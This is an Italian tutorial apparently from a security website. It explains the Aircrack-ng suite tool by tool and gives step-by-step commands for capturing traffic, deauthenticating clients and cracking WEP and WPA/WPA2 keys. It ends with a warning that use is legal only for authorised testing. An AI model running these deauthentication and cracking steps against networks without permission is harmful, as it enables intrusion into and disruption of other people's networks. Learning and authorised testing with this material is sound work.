Aircrack-ng: La Suite per il Cracking delle Reti Wireless
Aircrack-ng è una suite di strumenti progettati per testare la sicurezza delle reti wireless. Questo software open source è particolarmente noto per la sua capacità di analizzare e violare la rete Wi-Fi con protocolli di sicurezza WEP, WPA e WPA2. Originariamente nato come Aircrack, il progetto si è evoluto per includere una vasta gamma di funzionalità che lo rendono uno strumento essenziale per i penetration tester e gli esperti di sicurezza.
Storia di Aircrack-ng
Aircrack fu originariamente creato da Christophe Devine nel 2006 come un software destinato a violare il protocollo WEP, che all’epoca era lo standard di sicurezza per le reti Wi-Fi. Con il tempo, il progetto è stato abbandonato dal suo creatore originale, ma è stato ripreso dalla comunità open-source, che ha dato vita alla versione Aircrack-ng.
La nuova versione ha ampliato le sue capacità, supportando il cracking di WPA/WPA2, migliorando la compatibilità con un maggior numero di schede di rete e aggiungendo strumenti per il monitoraggio, l’iniezione di pacchetti e l’analisi dei dati. Oggi, è uno dei software più utilizzati nei test di sicurezza delle reti wireless.
Caratteristiche Principali di Aircrack-ng
Aircrack-ng non è un singolo programma, ma una suite completa di strumenti che offre varie funzionalità per analizzare e testare reti wireless:
- Cattura dei pacchetti : Consente di intercettare il traffico di una rete wireless in modalità passiva.
- Decrittazione delle chiavi : Supporta il cracking delle chiavi WEP e WPA/WPA2 utilizzando tecniche avanzate come gli attacchi basati su dizionario o sulla forza bruta.
- Monitoraggio : Analizza l’ambiente wireless per identificare reti, dispositivi e potenziali vulnerabilità.
- Attacchi di iniezione : simula attacchi per testare la resistenza di una rete wireless.
Installazione di Aircrack-ng
Aircrack-ng è compatibile con diversi sistemi operativi, tra cui Linux, Windows, macOS e Android (tramite applicazioni come Termux). Tuttavia, funziona meglio su Linux, poiché molte delle sue funzionalità richiedono il supporto del monitoraggio wireless e dell’iniezione di pacchetti, disponibili principalmente su questo sistema operativo.
Per installare Aircrack-ng su Linux (ad esempio su Kali Linux), basta eseguire:
sudo apt update
sudo apt install aircrack-ng
Strumenti inclusi nella Suite Aircrack-ng
Questo software è composto da più programmi che lavorano insieme per completare le diverse fasi di un attacco o di un test di sicurezza. Di seguito una panoramica dei principali strumenti:
1. Airmon-ng
Configura la scheda di rete in modalità monitor, necessaria per catturare i pacchetti wireless.
Comando : airmon-ng start <interfaccia>
Esempio : airmon-ng start wlan0
(Questo comando mette la scheda di rete wlan0
in modalità monitor.)
2. Airodump-ng
Cattura pacchetti wireless e analizza i dati delle reti circostanti.
Comando : airodump-ng <interfaccia_monitor>
Esempio : airodump-ng wlan0mon
(Questo comando mostra tutte le reti wireless rilevabili).
Filtra una rete specifica : airodump-ng -c <canale> --bssid <BSSID> -w <file_output> <interfaccia_monitor>
Esempio: airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w cattura wlan0mon
3. Aireplay-ng
Funzione : avviare pacchetti per simulare attacchi o incrementare il traffico sulla rete target.
Comandi principali :
Attacco di Deautenticazione : aireplay-ng --deauth <numero_pacchetti> -a <BSSID> -c <MAC_client> <interfaccia_monitor>
Esempio: aireplay-ng --deauth 10 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon
Richiesta ARP di attacco : aireplay-ng --arpreplay -b <BSSID> -h <MAC_client> <interfaccia_monitor>
4. Aircrack-ng
Funzione : Cracca le chiavi WEP e WPA/WPA2 utilizzando i file di cattura generati da Airodump-ng.
Comando : aircrack-ng -w <dizionario> -b <BSSID> <file_cattura>
Esempio : aircrack-ng -w wordlist.txt -b 00:11:22:33:44:55 cattura-01.cap
5. Airdecap-ng
Funzione : Decripta il file di cattura una volta ottenuta la chiave.
Comando :airdecap-ng -w <chiave> <file_cattura>
Esempio : airdecap-ng -w mykey cattura-01.cap
6. Airtun-ng
Funzione : Configura un tunnel virtuale per sniffare il traffico di una rete criptata.
Comando : airtun-ng -a <BSSID> -w <chiave> <interfaccia>
7. Pacchetto forge-ng
Funzione : Crea pacchetti personalizzati per attacchi avanzati.
Comando : packetforge-ng -0 -a <BSSID> -h <MAC_client> -k <IP_dest> -l <IP_sorgente> -y <file_ARP>
Spiegazione dei Comandi per il Cracking di WEP
Il cracking di reti con protocollo WEP è relativamente semplice grazie a Aircrack-ng. Questo perché WEP ha una notevole debolezza nei suoi algoritmi di cifratura.
- Avviare la modalità monitor :
airmon-ng start wlan0
- Catturare pacchetti dalla rete target :
airodump-ng -c <canale> --bssid <BSSID> -w cattura wlan0mon
- Iniziare i pacchetti per aumentare il traffico :
aireplay-ng --arpreplay -b <BSSID> -h <MAC_client> wlan0mon
- Craccare la chiave WEP :
aircrack-ng -b <BSSID> cattura-01.cap
Spiegazione dei Comandi per il Cracking di WPA/WPA2
Il cracking di WPA/WPA2 richiede la cattura del four-way handshake . Questo viene ottenuto con i seguenti passaggi:
- Catturare il traffico wireless :
airodump-ng -c <canale> --bssid <BSSID> -w cattura wlan0mon
- Eseguire un attacco di autenticazione :
aireplay-ng --deauth 10 -a <BSSID> -c <MAC_client> wlan0mon
- Rompere la chiave WPA/WPA2 :
aircrack-ng -w <dizionario> cattura-01.cap
Utilizzi Etici e Legali di Aircrack-ng
Aircrack-ng è uno strumento potente e versatile, ma il suo utilizzo deve essere limitato ai test di sicurezza autorizzati. È illegale utilizzarlo per violare reti senza permesso e può portare gravi conseguenze legali. Gli amministratori di rete ei penetration tester usano Aircrack-ng per identificare la vulnerabilità nelle loro reti e implementare misure di sicurezza appropriate.
Conclusione
Aircrack-ng rimane una delle suite più completa e potente per la sicurezza delle reti wireless. La sua capacità di catturare, analizzare e violare la rete Wi-Fi rende indispensabile il suo utilizzo in contesti di sicurezza, ma richiede anche una profonda responsabilità etica per evitare abusi.
web site: BorderlineZ